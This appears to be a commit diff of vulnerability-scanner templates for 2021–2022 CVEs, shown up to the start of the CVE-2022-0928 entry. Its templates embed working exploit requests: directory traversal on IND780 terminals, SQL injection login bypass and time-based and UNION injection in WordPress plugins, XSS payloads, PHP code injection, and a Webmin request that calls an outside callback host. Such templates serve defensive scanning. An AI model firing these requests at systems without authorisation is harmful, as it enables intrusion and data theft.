A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40661
cwe-id: CWE-22
metadata:
google-query: inurl:excalweb.dll
shodan-query: IND780
verified: "true"
tags: cve,cve2021,ind780,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ExePath=\Windows'
- 'WorkDir=\Windows'
condition: and
- type: status
status:
- 200

6
cves/2021/CVE-2021-41432.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2021-41432
info:
name: FlatPress 1.2.1 - Cross-site scripting
name: FlatPress 1.2.1 - Stored Cross-Site Scripting
author: arafatansari
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/flatpressblog/flatpress/issues/88
- https://nvd.nist.gov/vuln/detail/CVE-2021-41432
@ -74,3 +74,5 @@ requests:
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
# Enhanced by md on 2022/10/17

45
cves/2021/CVE-2021-43510.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2021-43510
info:
name: Simple Client Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
reference:
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43510
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
requests:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3d'1'--+-&password=as
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "text/html")'
- 'status_code_1 == 200'
- 'contains(body_1, "{\"status\":\"success\"}")'
- 'contains(body_2, "Welcome to Simple Client")'
condition: and

54
cves/2021/CVE-2021-44451.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-44451
info:
name: Apache Superset Default Login
name: Apache Superset - Default Login
author: dhiyaneshDK
severity: medium
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
@ -25,17 +25,18 @@ requests:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
- |
GET /dashboard/list/ HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
@ -43,32 +44,25 @@ requests:
password:
- admin
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- 'session'
- type: word
part: body_3
words:
- 'DashboardFilterStateRestApi'
extractors:
- type: regex
name: csrf_token
group: 1
part: body
internal: true
regex:
- 'value="(.*?)">'
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
- type: word
part: header
words:
- 'session'
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true

52
cves/2022/CVE-2022-0147.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0147
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0147
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'"
- "toplevel_page_wp-gdpr-compliance"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

33
cves/2022/CVE-2022-0346.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2022-0346
info:
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
author: Akincibor
author: Akincibor,theamanrawat
severity: medium
description: |
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
@ -16,35 +16,26 @@ info:
cve-id: CVE-2022-0346
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
verified: true
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
requests:
- method: GET
path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
stop-at-first-match: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
condition: or
- type: word
part: body_1
words:
- "<img src onerror=alert(document.domain)>"
- "Invalid Provider type specified"
condition: and
- type: word
part: header
part: body_2
words:
- text/html
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# Enhanced by md on 2022/09/08
- "2ef3baa95802a4b646f2fc29075efe34"

38
cves/2022/CVE-2022-0349.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2022-0349
info:
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
author: edoardottt
severity: critical
description: |
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
reference:
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
- https://wordpress.org/plugins/notificationx/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0349
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nx_id=sleep(6) -- x
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and

6
cves/2022/CVE-2022-0412.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0412
info:
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
author: edoardottt
severity: critical
description: |
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
reference:
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 400
# Enhanced by mp on 2022/10/12

6
cves/2022/CVE-2022-0535.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0535
info:
name: E2Pdf < 1.16.45 - Cross-Site Scripting
name: WordPress E2Pdf <1.16.45 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The E2Pdf WordPress plugin before 1.16.45 does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/a4162e96-a3c5-4f38-a60b-aa3ed9508985
- https://wordpress.org/plugins/e2pdf/
@ -62,3 +62,5 @@ requests:
group: 1
regex:
- 'name="_nonce" value="([0-9a-zA-Z]+)"'
# Enhanced by md on 2022/10/18

7
cves/2022/CVE-2022-0679.yaml
View File

@ -1,15 +1,14 @@
id: CVE-2022-0679
info:
name: Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE
name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion
author: Veshraj
severity: critical
description: |
The plugin fails to validate and sanitize the lib_path parameter before it is passed into a call to require() via the narnoo_distributor_lib_request AJAX action (available to both unauthenticated and authenticated users) which results in the disclosure of arbitrary files as the content of the file is then displayed in the response as JSON data. This could also lead to RCE with various tricks but depends on the underlying system and it's configuration.
WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
reference:
- https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8
- https://nvd.nist.gov/vuln/detail/CVE-2022-0679
- https://www.cvedetails.com/cve/CVE-2022-0679/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -39,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

100
cves/2022/CVE-2022-0735.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-0735
info:
name: GitLab CE/EE - Runner Registration Token Disclosure
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
reference:
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0735
cwe-id: CWE-863
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2022,gitlab
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors:
- type: regex
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'

6
cves/2022/CVE-2022-0781.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0781
info:
name: Nirweb support < 2.8.2 - Unauthenticated SQLi
name: WordPress Nirweb Support <2.8.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
- https://wordpress.org/plugins/nirweb-support/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/12

36
cves/2022/CVE-2022-0785.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-0785
info:
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0785
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0785
cwe-id: CWE-89
metadata:
verified: "true"
tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and

39
cves/2022/CVE-2022-0788.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-0788
info:
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0788
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
requests:
- raw:
- |
@timeout: 10s
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and

41
cves/2022/CVE-2022-0817.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-0817
info:
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
variables:
num: "999999999"
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(body, md5(num))"
- 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")'
condition: and

52
cves/2022/CVE-2022-0824.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-0824
info:
name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
author: cckuailong
severity: high
description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
reference:
- https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-0824
- https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
- https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-0824
cwe-id: CWE-284
tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
requests:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: redirect=1;testing=1;PHPSESSID=;
user={{username}}&pass={{password}}
- |
POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/filemin/?xnavigation=1
link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "Failed to write to /{{ranstr}}/index.html"

44
cves/2022/CVE-2022-0867.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-0867
info:
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
reference:
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0867
cwe-id: CWE-89
metadata:
verified: "true"
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
- |
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(content_type_1, "text/html")'
- 'contains(body_2, "ArpPriceTable")'
condition: and

45
cves/2022/CVE-2022-0885.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-0885
info:
name: Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
reference:
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0885
cwe-id: CWE-94
metadata:
verified: "true"
tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "<!DOCTYPE html"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

12
cves/2022/CVE-2022-0928.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-0928
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
author: amit-jd
